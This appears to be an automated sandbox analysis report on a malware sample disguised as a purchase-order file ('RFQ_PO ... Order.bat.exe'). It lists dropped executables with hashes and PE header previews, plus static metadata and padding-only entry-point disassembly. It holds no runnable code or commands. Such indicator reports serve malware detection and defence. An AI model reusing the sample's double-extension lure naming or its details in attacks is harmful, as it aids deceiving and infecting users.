                                                                                                                                                                    SHA-512:FC037DB2E373B2AA0CF75FD6FC595AB071715056773943EEFC95F9171AA06E911F7407FEA3F853E671F56B0585133D375D0136BC65C11D2CB6D119BEFDE35C97
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1235968
                                                                                                                                                                    Entropy (8bit):5.182221474612602
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:npFtQOPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yOPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4C2FEBAD6B92DDA4F72130648DB37727
                                                                                                                                                                    SHA1:16AB41FD96DE34B40BB860192C540AA57A4C5BDF
                                                                                                                                                                    SHA-256:E7E1B8495A5CF1C278AF9D6F788DEF1389C3782A533DF71A3DA1C5C4833A3DE9
                                                                                                                                                                    SHA-512:09DD13AFFADCCE72DA92A27A98157EF4892E6C070E96E7DD94DA6ABCA5F25A9A882D943B55FAD6162FC5360E84AF8F2A277BCB24A2F054C9632F029558983D52
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):7.1024001569324495
Encrypted:false
SSDEEP:24576:w3frCoQItLsiLPLe24CxruW4bIhllbsqjnhMgeiCl7G0nehbGZpbD:w3fzsIPLkCNuVbIhDPDmg27RnWGj
MD5:CDA6931510F865D0FFDAD4D8F3792A91
SHA1:01BBEDB273146A1BC71B1FBA13F51832F3595E22
SHA-256:8208403A7F5F52ABC18AE789FBB373AF2907DCCA22A52A828E0D4F965B338369
SHA-512:891E460228F4535F3749DD47BB9CCC18F43EC3EAFCE7B86698CE5311EA7EB195AEBBEB4EC4A867DB9B362BB5124826C8E74A1A536E528CD0EC6A163691FE26B7
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1846784
Entropy (8bit):6.939467102431726
Encrypted:false
SSDEEP:24576:9W6BApg2YuyuNDYTabvcRvNYf8km1+sqjnhMgeiCl7G0nehbGZpbD:9F2YuHNETovcvNYf8kmEDmg27RnWGj
MD5:02C2C736D5DC9AC9088C92AFC077A118
SHA1:8E1C6AD4CEA03D6DAD6C9382EB3492E94FA76E4A
SHA-256:D04DD90DAA996DD3CBC08622C607FE1DE4D49EB562038407F638330CAD1D5B2A
SHA-512:EE52AB23631FB164612D78E27C67EDC785AD078EB38601744B103CB7BA1D2AB202FCF345796BC1B65570EFD4BF52A2C1785D7C859E99835F7873AEED5FE702C1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......Y.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):7.2389167468577975
Encrypted:false
SSDEEP:24576:2iW6ZvAKF5i/dN9Bdexj9Trk+FPsqjnhMgeiCl7G0nehbGZpbD:2YxF50b9Bdm9TxNDmg27RnWGj
MD5:EA5AC5AC3ADFDE43933DEF676A6978C0
SHA1:D1552930E52437D1DBB04DFFFD37EBBA70CC8810
SHA-256:C9D88CD42F95A84C861045776AB2065D98F6054AFE17BC09BBE621B8B1276AF6
SHA-512:86312C0F7151E8CB68897221976D8BC22E5F01E983D5158080EA7973791DE29F723F007C4B37EC94657B9D000DD1DCADA262919D42A5EEB62CA13338C00E51F9
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.......................................... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):5.476608439640678
Encrypted:false
SSDEEP:24576:xJnJ5D3WYisqjnhMgeiCl7G0nehbGZpbD:xJnJ5DGYmDmg27RnWGj
MD5:85B511CA7AB5F39352DEB0D3C0A048DC
SHA1:98DE60EE9217145B77CC0F9F87C272C405CCAEB6
SHA-256:68EC9682BB9D426ED6CDBCCF2BAE6FDFDCD8D3800965FF451FBFD3BAABCAEDA3
SHA-512:32F3D598ABF202587EABFF7F408D82B739D22D0A4CCBE275FB773F4333CC8A3FD2330C8262B7C922ABE092A846DB2AEE10C71839295F63280E640B56269D865A
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.......................................... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2075136
Entropy (8bit):6.736592476107803
Encrypted:false
SSDEEP:49152:1PK86JYTerDjfJ2313e1mP1MdnUhDmg27RnWGj:rD527BWG
MD5:4918AAD3E567A767F75F065692DB3366
SHA1:D063A22F0DEB3DE5C18911BACF6355F614EFB1F8
SHA-256:0278E9FA82C5F1D403AD07EE0C7D810AA5ED22F27C3123704CD2CB1994D2B2C1
SHA-512:D63CCE0FB875602109796270E3C1B63063CF941FA0992B8EE61FBF305C1E7697A39C9DDBE800E375BB8E8922A81A73B5AF4836E094246418C1C66AAD9B90748C
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ....... ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1225728
Entropy (8bit):5.163333520896699
Encrypted:false
SSDEEP:12288:cEP3R6WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:X6WsqjnhMgeiCl7G0nehbGZpbD
MD5:837DCB726B9BB3B6F4FEF3318B9DEEAD
SHA1:184A2158CF8AA914ACD8125FB4C303D3C182F526
SHA-256:5F032350E125623DBAF737A2E5000C2782E04BC0459421293C42379358A35E3A
SHA-512:610470C26125A6F621D336174EBDE190D0E058F72046931966D4AC633F25B5A7A9BA86839C3B4CD1719037DC76BA43962CEA9C3A1E8CAA54D8070E8D577EF135
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................#$.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................
Process:C:\Windows\System32\alg.exe
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.984932009598044
Encrypted:false
SSDEEP:384:ZeUsQt2OOB3j9XAKKf+gHSC04RSjNOMj0n:Zts0VOj2KRC0OSROMM
MD5:F91D139C293E15212882301142D90CE4
SHA1:90838690EEF5AC6816347C6DF17389013EB5B4BE
SHA-256:B415ED0CDD238ADD5FD2A503BD327347019131D680EAC52029E16E7EE9C6F5B4
SHA-512:B29AA028B5852F381F0FBE0508644F40B309171DCF56154E8BE8BD5AFE32F08C668D931E3426D349F9751DB9A86A5C890025239FF3CD6412EE19ED576E5F86C8
Malicious:false
Reputation:unknown
Preview:.|..5..v..M.=60....k...!>...B)MG.4v.~MJ5..}.\.x...a.f.....'.).3."......'(^o.[..R.s...f...>..E.*c......h.gAS....}......../x...N..>[A.V...4;...H.*.w|.;/.<.'....{Q..J^e.z:..ZuI..j..QX...>..b..t.d......+........s..t...k..n..r!...A#..P.|P....D.."..9....MSv&nA.f....H~3........l9.m.4C.W.U9bRxg..Ek..{.tt.....S.].0}..S6.<...L=..)......*w.....oq..=cQ....%p.\.=.b.L..U...t...8_........X..D...N.....sE.S.oUY..{..!...f.8......#.Y...&......8.`...<...|..N.wb..Dx.9.SJ..M.=.....3,._Y;.J...@....g..Z..gu......T......b..#..?....M..n!..PQ.'x.W<.h%.I.<P",..C..._.w<..%f...:....W.z..{...a.k....[ ..&;.........f.\.G.*7..dm.2.6...|..{...8w0..Y.{..Z.{.|.>. ,.H.D......+./.L.{.0..dVk.'..)/UB.%..|......OfS..BB.........k.../.[D...~..re5^......../..2..q...=.Rl.w...~.../..5...t.-..|.+.V../........3..d8..N...(&1.@<.......[. h.....o...#..-.K...v.....g.Dp&3..5.B2.........FILd..\......~.!./1.E.ca.......K...C{k2...8d,..ei.~..HJm..#.k...............av....i.&6i.5I...+....=.L..^..o...l.{.
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1278464
Entropy (8bit):5.142998052553884
Encrypted:false
SSDEEP:12288:Ojky5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OIy5sqjnhMgeiCl7G0nehbGZpbD
MD5:2AF6C23F4C869205351AA38C5DD66D6E
SHA1:3120EE38C0E69C08E2BC00F8D46AFBB581FCD8E1
SHA-256:D3509230E3516CF35D78EF5FBC675B83A66A3CDCBFDE68660877669E7EE23FEB
SHA-512:8B8EDA55180078BC96E8F4947F3CD84A64ECD30A2BA745D7B8D6FFB31C4753758D75B1F0D982372007F7F98DDE0DA997B156A29881197747F27EA1945D19D032
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1199616
Entropy (8bit):5.083912734833264
Encrypted:false
SSDEEP:12288:L4DbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2bsqjnhMgeiCl7G0nehbGZpbD
MD5:ABB50E8166D8F7CA9596696CE75B8653
SHA1:E4AB7BEE68145417EAFC19F2BB042D3AC06BB22E
SHA-256:5DA2AC1B748B7CF966503F1D8B3283A23391CCEC94E7F81F077FD02D9BAB808B
SHA-512:2189F96F3A2F4D75C8482728A98BAF1DF2E15E6A8C6AE181CDDE56BDA4836647FF8A612833090E94303911D8F9A0577E8BAD56432E94041F2D8B48DBB471E91C
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1146880
Entropy (8bit):5.027589917373733
Encrypted:false
SSDEEP:12288:c9fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SfsqjnhMgeiCl7G0nehbGZpbD
MD5:F35B03B0A56AB372234FE7A532455C96
SHA1:B02C8D43B01DAABCB9B25604C4C260ED88533800
SHA-256:491176B9690D211107E07B12B10845E49364AD2CBA4FA52BE309C9BB309ED9E4
SHA-512:CC5AC5ECAAFEC96D866827945BCC529536DAA85920DFD958E58524B9CE6963485B279CBFF702D87353C9FEC6A96FB2E7DBE770CD0377B8429991E06C0B8F1C8F
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):5161984
Entropy (8bit):7.256979393146544
Encrypted:false
SSDEEP:98304:ECLZqizFGeZV8ppBcq+NFabvy5FEz9AGknDD527BWG:XLDzFGmVWQq+NFarCFUInDVQBWG
MD5:093EF201B5195154962FBEFB83EFDBD9
SHA1:9E41A58490DE46C58FD4DEBAD538030C2E562065
SHA-256:499A6F9A0752832220F633EE4C333C3887755CF2F2F0B9C8E3ED5D1215FAE91A
SHA-512:E25379A4182699C43FF9AD9A6A08B47FE51FC8D8F29D544995476945E5749778C4C7D18BE931AEE264EF4315163EE98AF076ACDDE3E3F0628F9AA8F5A8A36ADB
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1303552
Entropy (8bit):7.171589649045072
Encrypted:false
SSDEEP:24576:MZ0FxT1UoYr99GdcpKmsqjnhMgeiCl7G0nehbGZpbD:AwWcqDmg27RnWGj
MD5:0C54A7E73768E6C53E87391113A18ADF
SHA1:11C1A323C8F15F39426141F4C00D608923294203
SHA-256:402AD7AF50C64802065A2730446D7646F95865E491F68865A9F51BCB57E3B934
SHA-512:A5A424959A179DEA16C14182F7358F1E758224BF60947777E566CE04A68047C1DD2CE6B99A82513C5FEF4E42203980AA8E65FE4ABEA18DA61A002A8EED4645A2
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1339392
Entropy (8bit):5.269312734160651
Encrypted:false
SSDEEP:12288:tyoKo2fRple9pBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:tyocJApBsqjnhMgeiCl7G0nehbGZpbD
MD5:E407267AE95CAC7E022BCB9CB497566F
SHA1:AA25A40070A0B74D196B5A6AB66EF903C0D08F3F
SHA-256:D222BCF76DD12E72229793A4EACC23A04B18F06C846E42DFF06B49FD5674ECBF
SHA-512:D76B7035C46C8EE70E4DDBD08EEFF29B208614FA39D0FCC79CCD7678D287177A8CA0AB5B60830890BCE3A1E1A34B68FC7D80547F8ABDC9D8CA3B09F3E275DCAE
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2164736
Entropy (8bit):7.062054458425701
Encrypted:false
SSDEEP:49152:YWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKBDmg27RnWGj:60zuNI1D527BWG
MD5:ADB425AC8592C2AD75F997794106A5E3
SHA1:85E502E17FBE2A4AD0B2B6CC8CB7F5909DCDFE19
SHA-256:099D71F0E93324540082BA24519F3D159B6C6E2039137D749A6DF584CEC1EFEC
SHA-512:1E1FA5E5833FB420143D21A804485BBC1CB79466058A333F7CE0D8317C212F4C1AAE57AFC0FF6CC12E94D9352AFF64471F1E1E91DC275218AA76C768CF349371
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09988831476579194
Encrypted:false
SSDEEP:6:QcCVw1CK3l/k/uMclF6vMclFq5zrbNOn+SkUeYDwDzymfw1Czj:nAwMKV/kqF69Fq5zrJO+pawHymfwMv
MD5:39D963F879A8A3272D7A454D0C1CB098
SHA1:59937021900C69B85995F94AE2E24EE982195A87
SHA-256:93592A32A7AE720A5E7F003C1D8F3712E6AD9F754543EABDE12D6D226134A4A2
SHA-512:2708BAA6529BFE2C6D43394528869D085BC6F678182132F26BFD0133F39350BEDB7C9685A2C54D54E87AC064620D15B17A862A48085199EC0BDC9BBE4EF1EE5E
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.10132232056834319
Encrypted:false
SSDEEP:6:DIJCK3l/k/uMclF6vMclFq5zrUHNMu3n+SkUeYDwDzyMyCzb:DCCKV/kqF69Fq5zrWX+pawHyvCn
MD5:2B0805473B0702A487FAD39C021C3FC6
SHA1:99AE9BB4A4FBF0983C710153E10FF7352A311427
SHA-256:5C72DFAF180B4E03B00BEBC6C381DA830BDDEB0C4A18390509D7D49A0E4D972F
SHA-512:1A50032195A3455A2CD5A33D134EB4ECAA626BDC1E155FDF01029A062DF637D94F905847D0CDA7156D915EE9E04BD8C6DEA5D44C70E2590D2100216EAE7B0B36
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09875454166291896
Encrypted:false
SSDEEP:6:uUeCK3Nk/uMclF6vMclFq5zrj3HNIn+SkUeYDwDzy1Czr:uZCK9kqF69Fq5zrZI+pawHy1C3
MD5:0E668322BEABC3B502E254931CB6301B
SHA1:BA401154DBECDD01EFC6ED695C0C243D42A54C88
SHA-256:7357958C9A30C1C001E81ED462CDF8A3BB56E1051081FAB831D9E6544AEC7168
SHA-512:10E8A32322D7497268BBD6CE2659160FECB03CAC032C00CE77ABC71129869C6E0CC674009373ABEEF4E4B0B2059CBFFDC80AAAAA487BB9811AD345A47A16AB72
Malicious:false
Reputation:unknown
                                                                                                                                                                    Preview:....X...X.......................................X...!...........................@...x.....TU....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........UF...A..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.@...x.....TU............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.884290221622837
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    File name:RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                    MD5:06c13587e9a7af60860cb6e2c4f3a7b2
                                                                                                                                                                    SHA1:238f5ddcd0193aba7b760b7ab6f3f982d73383b5
                                                                                                                                                                    SHA256:efd64c0b88bbe45461d13b2a0acd9544218f819f4579af35b5fc92e20d5f6fa5
                                                                                                                                                                    SHA512:b9254b49e477e7d60f077ec17ea2dee374d06c6ac095f1b70797d56fa523729b2f23cf9c5810972c515ea7d4d15923314b93da8b50a2aaf494d6133474cb6c8e
                                                                                                                                                                    SSDEEP:24576:y1zGUxjCMfFrJirFpgEZR4IGqiHVtAgjSN9/pggC0gPAMhCKqX:0L/9QrF/ZR4DH4/begC0WAfZ
                                                                                                                                                                    TLSH:9465018D3125B18FC497C9708A54ED78EA746CAA9B0BC203D5E31EEFBD1D5879E041E2
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.................0.............n.... ........@.. .......................@............@................................
                                                                                                                                                                    Icon Hash:323636b29699c72c
                                                                                                                                                                    Entrypoint:0x55c96e
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0xC6CF0F5C [Wed Sep 11 20:17:32 2075 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
Data directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x15c91c        | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x15e000        | 0x2a08       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x162000        | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Sections

Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0x15a974     | 0x15aa00 | 10f3457065cfc79b07e8b4db80c74c7c | False    | 0.9333401888748648 | data      | 7.887666262860419   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0x15e000        | 0x2a08       | 0x2c00   | 69617c58d9231710e87534bbc5354806 | False    | 0.8746448863636364 | data      | 7.485994825853279   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x162000        | 0xc          | 0x200    | 8b753ce6ef7cd20af691528b93a2087e | False    | 0.044921875        | data      | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
